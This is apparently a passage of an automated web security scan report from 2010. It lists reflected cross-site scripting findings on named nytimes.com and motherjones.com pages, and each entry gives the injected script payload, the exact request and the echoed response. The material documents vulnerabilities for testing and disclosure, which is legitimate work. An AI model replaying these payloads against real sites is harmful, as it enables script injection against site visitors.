3.142. http://mediadecoder.blogs.nytimes.com/2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mediadecoder.blogs.nytimes.com
Path:	/2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e403"><script>alert(1)</script>d4b8c05b2e1 was submitted in the src parameter. This input was echoed as 9e403\"><script>alert(1)</script>d4b8c05b2e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/?src=twr9e403"><script>alert(1)</script>d4b8c05b2e1 HTTP/1.1
Host: mediadecoder.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:06:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://mediadecoder.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
E&query=qstring&keywords=New+York+Times;television;guide+to+television;TV+Decoder;Carpetbagger;guide+to+media;newspapers;magazines;media;movies;marketing;new+media.+;mel-gibson;movies;new-media&src=twr9e403\"><script>alert(1)</script>d4b8c05b2e1">
...[SNIP]...

3.143. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://motherjones.com
Path:	/kevin-drum/2010/11/deficit-commission-serious

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ada2"><script>alert(1)</script>177d0296e29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /kevin-drum/20101ada2"><script>alert(1)</script>177d0296e29/11/deficit-commission-serious HTTP/1.1
Host: motherjones.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Cache-Control: public, max-age=900
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1289613974"
Last-Modified: Sat, 13 Nov 2010 02:06:14 GMT
Content-Length: 80914
Date: Sat, 13 Nov 2010 02:06:15 GMT
X-Varnish: 699349395
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="/user/login?destination=kevin-drum/20101ada2"><script>alert(1)</script>177d0296e29/11/deficit-commission-serious" title="Login">
...[SNIP]...

3.144. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://motherjones.com
Path:	/kevin-drum/2010/11/deficit-commission-serious

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32510"><script>alert(1)</script>e15e07f5a9a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /kevin-drum/2010/1132510"><script>alert(1)</script>e15e07f5a9a/deficit-commission-serious HTTP/1.1
Host: motherjones.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Cache-Control: public, max-age=900
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1289613988"
Last-Modified: Sat, 13 Nov 2010 02:06:28 GMT
Content-Length: 80832
Date: Sat, 13 Nov 2010 02:06:29 GMT
X-Varnish: 699351119
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="/user/login?destination=kevin-drum/2010/1132510"><script>alert(1)</script>e15e07f5a9a/deficit-commission-serious" title="Login">
...[SNIP]...

3.145. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://motherjones.com
Path:	/kevin-drum/2010/11/deficit-commission-serious

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70bd9"><script>alert(1)</script>957dc10fdf0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /kevin-drum/2010/11/deficit-commission-serious70bd9"><script>alert(1)</script>957dc10fdf0 HTTP/1.1
Host: motherjones.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Cache-Control: public, max-age=900
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1289613992"
Last-Modified: Sat, 13 Nov 2010 02:06:32 GMT
Content-Length: 209766
Date: Sat, 13 Nov 2010 02:06:33 GMT
X-Varnish: 699351724
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="/user/login?destination=kevin-drum/2010/11/deficit-commission-serious70bd9"><script>alert(1)</script>957dc10fdf0" title="Login">
...[SNIP]...

3.146. http://movies.nytimes.com/2010/11/10/movies/10morning.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/10/movies/10morning.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db374"><script>alert(1)</script>0629960ed8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/10/movies/10morning.html?db374"><script>alert(1)</script>0629960ed8c=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:06 GMT
Content-type: text/html
Content-Length: 73577

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/10/movies/10morning.html?db374"><script>alert(1)</script>0629960ed8c=1&pagewanted=print">
...[SNIP]...

3.147. http://movies.nytimes.com/2010/11/10/movies/10morning.html [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/10/movies/10morning.html

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40d84"><script>alert(1)</script>ce1cd022825 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/10/movies/10morning.html?src=dayp40d84"><script>alert(1)</script>ce1cd022825 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:07 GMT
Content-type: text/html
Content-Length: 74132

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/10/movies/10morning.html?src=dayp40d84"><script>alert(1)</script>ce1cd022825&pagewanted=print">
...[SNIP]...

3.148. http://movies.nytimes.com/2010/11/12/movies/12con.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12con.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff212"><script>alert(1)</script>0c4b8fd9ceb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12con.html?ff212"><script>alert(1)</script>0c4b8fd9ceb=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:19 GMT
Content-type: text/html
Content-Length: 68389

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12con.html?ff212"><script>alert(1)</script>0c4b8fd9ceb=1&pagewanted=print">
...[SNIP]...

3.149. http://movies.nytimes.com/2010/11/12/movies/12con.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12con.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31673"><script>alert(1)</script>5674461d5ef was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12con.html?ref=todayspaper31673"><script>alert(1)</script>5674461d5ef HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:24 GMT
Content-type: text/html
Content-Length: 67711

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12con.html?ref=todayspaper31673"><script>alert(1)</script>5674461d5ef&pagewanted=print">
...[SNIP]...

3.150. http://movies.nytimes.com/2010/11/12/movies/12cool.html [hpw parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12cool.html

Issue detail

The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6752"><script>alert(1)</script>74abf7409cf was submitted in the hpw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12cool.html?hpwe6752"><script>alert(1)</script>74abf7409cf HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:14 GMT
Content-type: text/html
Content-Length: 72542

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12cool.html?hpwe6752"><script>alert(1)</script>74abf7409cf&pagewanted=print">
...[SNIP]...

3.151. http://movies.nytimes.com/2010/11/12/movies/12cool.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12cool.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87b8d"><script>alert(1)</script>54b1ab9b218 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12cool.html?hpw&87b8d"><script>alert(1)</script>54b1ab9b218=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:15 GMT
Content-type: text/html
Content-Length: 72399

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12cool.html?hpw&87b8d"><script>alert(1)</script>54b1ab9b218=1&pagewanted=print">
...[SNIP]...

3.152. http://movies.nytimes.com/2010/11/12/movies/12cool.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12cool.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dd44"><script>alert(1)</script>9aa1f156ce7 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12cool.html?ref=todayspaper8dd44"><script>alert(1)</script>9aa1f156ce7 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:20 GMT
Content-type: text/html
Content-Length: 72629

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12cool.html?ref=todayspaper8dd44"><script>alert(1)</script>9aa1f156ce7&pagewanted=print">
...[SNIP]...

3.153. http://movies.nytimes.com/2010/11/12/movies/12disco.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12disco.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9017b"><script>alert(1)</script>45b207650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12disco.html?9017b"><script>alert(1)</script>45b207650=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:27 GMT
Content-type: text/html
Content-Length: 72730

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12disco.html?9017b"><script>alert(1)</script>45b207650=1&pagewanted=print">
...[SNIP]...

3.154. http://movies.nytimes.com/2010/11/12/movies/12disco.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12disco.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d08f"><script>alert(1)</script>69375a1df98 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12disco.html?ref=todayspaper2d08f"><script>alert(1)</script>69375a1df98 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:30 GMT
Content-type: text/html
Content-Length: 69744

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12disco.html?ref=todayspaper2d08f"><script>alert(1)</script>69375a1df98&pagewanted=print">
...[SNIP]...

3.155. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12eichmann.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1b27"><script>alert(1)</script>9def6fb92c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12eichmann.html?b1b27"><script>alert(1)</script>9def6fb92c5=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:31 GMT
Content-type: text/html
Content-Length: 73079

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12eichmann.html?b1b27"><script>alert(1)</script>9def6fb92c5=1&pagewanted=print">
...[SNIP]...

3.156. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12eichmann.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a15af"><script>alert(1)</script>c361f4dc1e3 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12eichmann.html?ref=todayspapera15af"><script>alert(1)</script>c361f4dc1e3 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:32 GMT
Content-type: text/html
Content-Length: 71255

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12eichmann.html?ref=todayspapera15af"><script>alert(1)</script>c361f4dc1e3&pagewanted=print">
...[SNIP]...

3.157. http://movies.nytimes.com/2010/11/12/movies/12helena.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12helena.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a48c1"><script>alert(1)</script>f0282204989 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12helena.html?a48c1"><script>alert(1)</script>f0282204989=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:29 GMT
Content-type: text/html
Content-Length: 67007

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12helena.html?a48c1"><script>alert(1)</script>f0282204989=1&pagewanted=print">
...[SNIP]...

3.158. http://movies.nytimes.com/2010/11/12/movies/12helena.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12helena.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64df0"><script>alert(1)</script>d14aae068de was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12helena.html?ref=todayspaper64df0"><script>alert(1)</script>d14aae068de HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:32 GMT
Content-type: text/html
Content-Length: 66696

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12helena.html?ref=todayspaper64df0"><script>alert(1)</script>d14aae068de&pagewanted=print">
...[SNIP]...

3.159. http://movies.nytimes.com/2010/11/12/movies/12magic.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12magic.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd739"><script>alert(1)</script>dc7aa52ab74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12magic.html?cd739"><script>alert(1)</script>dc7aa52ab74=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:29 GMT
Content-type: text/html
Content-Length: 65843

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12magic.html?cd739"><script>alert(1)</script>dc7aa52ab74=1&pagewanted=print">
...[SNIP]...

3.160. http://movies.nytimes.com/2010/11/12/movies/12magic.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12magic.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1406e"><script>alert(1)</script>b4e8ca7152d was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12magic.html?ref=todayspaper1406e"><script>alert(1)</script>b4e8ca7152d HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:34 GMT
Content-type: text/html
Content-Length: 66285

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12magic.html?ref=todayspaper1406e"><script>alert(1)</script>b4e8ca7152d&pagewanted=print">
...[SNIP]...

3.161. http://movies.nytimes.com/2010/11/12/movies/12shake.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12shake.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cb50"><script>alert(1)</script>3a8abc30d4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12shake.html?3cb50"><script>alert(1)</script>3a8abc30d4a=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:24 GMT
Content-type: text/html
Content-Length: 73541

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12shake.html?3cb50"><script>alert(1)</script>3a8abc30d4a=1&pagewanted=print">
...[SNIP]...

3.162. http://movies.nytimes.com/2010/11/12/movies/12shake.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12shake.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 936e2"><script>alert(1)</script>24773b8c686 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12shake.html?ref=todayspaper936e2"><script>alert(1)</script>24773b8c686 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:22 GMT
Content-type: text/html
Content-Length: 74178

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12shake.html?ref=todayspaper936e2"><script>alert(1)</script>24773b8c686&pagewanted=print">
...[SNIP]...

3.163. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12tiny.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f8da"><script>alert(1)</script>c3bf061f155 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12tiny.html?1f8da"><script>alert(1)</script>c3bf061f155=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:09 GMT
Content-type: text/html
Content-Length: 72793

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12tiny.html?1f8da"><script>alert(1)</script>c3bf061f155=1&pagewanted=print">
...[SNIP]...

3.164. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12tiny.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5e7b"><script>alert(1)</script>5a75fc2d357 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12tiny.html?ref=todayspaperf5e7b"><script>alert(1)</script>5a75fc2d357 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:11 GMT
Content-type: text/html
Content-Length: 73419

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12tiny.html?ref=todayspaperf5e7b"><script>alert(1)</script>5a75fc2d357&pagewanted=print">
...[SNIP]...

3.165. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [hpw parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12unstop.html

Issue detail

The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffbd2"><script>alert(1)</script>07947578a14 was submitted in the hpw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12unstop.html?hpwffbd2"><script>alert(1)</script>07947578a14 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:18 GMT
Content-type: text/html
Content-Length: 74619

...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?hpwffbd2"><script>alert(1)</script>07947578a14&pagewanted=print">
...[SNIP]...

3.166. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://movies.nytimes.com
Path:	/2010/11/12/movies/12unstop.html

Issue detail

